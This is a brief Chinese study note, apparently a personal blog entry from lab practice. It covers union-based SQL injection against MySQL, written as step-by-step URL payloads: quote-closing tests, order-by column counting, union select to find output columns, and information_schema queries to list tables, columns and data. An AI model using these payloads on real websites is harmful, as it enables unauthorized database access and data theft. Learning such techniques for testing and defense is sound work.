显错注入、联合查询

比较基础的东西，记录一下思路和SQL语句，靶场实战就不放了

1. 验证是否存在sql注入
2. 判断列数
3. 判断显示位
4. 获取数据库名称
5. 列出数据库中所有的表
6. 列出目标表中所有的字段
7. 列出目标字段中的信息

---

1. 判断是否存在注入点：

   在正常输入后面添加and 1=1 查看是否正常回显。如果一切正常说明该处存在注入点。#是数据库查询的结束标志。

   ?id=1' and 1=1#
   

   这里的?id=1’使用单引号闭合查询语句。不同的查询写法使用相应的闭合方式

   常见的闭合套路:先套一波娃，后面再统一整理

2. 猜解字段数：

   每一个数据库查询语句的结果都是一个表格，使用order by查询该查询结果一共查询了几个字段。因为使用union查询前后的字段数必须一致。

   ?id=1' and 1=1 order by 1#
   ?id=1' and 1=1 order by 2#
   .....
   

   一直尝试直到页面返回错误,得到字段数。

3. 查询联合输出点

   查询结果有多个字段，但不是每一个字段都在页面上有所显示，故使用union查找输出点。

   ?id=1' and 1=2 union select 1,2,3
   

   这里使用了一个1=2让前半句查询失效，这样查询的结果就是1,2,3.在页面中查找输出，发现是3，就表明查询的第3个字段是输出点。

4. 查询数据库名

   ?id=1' and 1=2 union select 1,1,database()
   

5. 利用MySQL系统自带库查询数据库中的表名

   ?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema= database() limit 0,1
   

   这里数据库可能不只有一个表，所以在查询结果后面使用limit 逐个输出。

6. 利用MySQL系统自带库查询数据库中表的字段

   ?id=1' and 1=2 union select 1,2,column_name from information_schema.columns where table_name='XXX' limit 0,1#
   

   这里的XXX就是上一步查询出来的表名字，逐个表查询。

7. 查询目标内容

   已知了表名、列名，猜测最有价值的字段，直接查询其内容。

   ?id=1' and 1=2 union select 1,2,XXX from YYY limit 0,1
   

   查询YYY表中的XXX字段内容。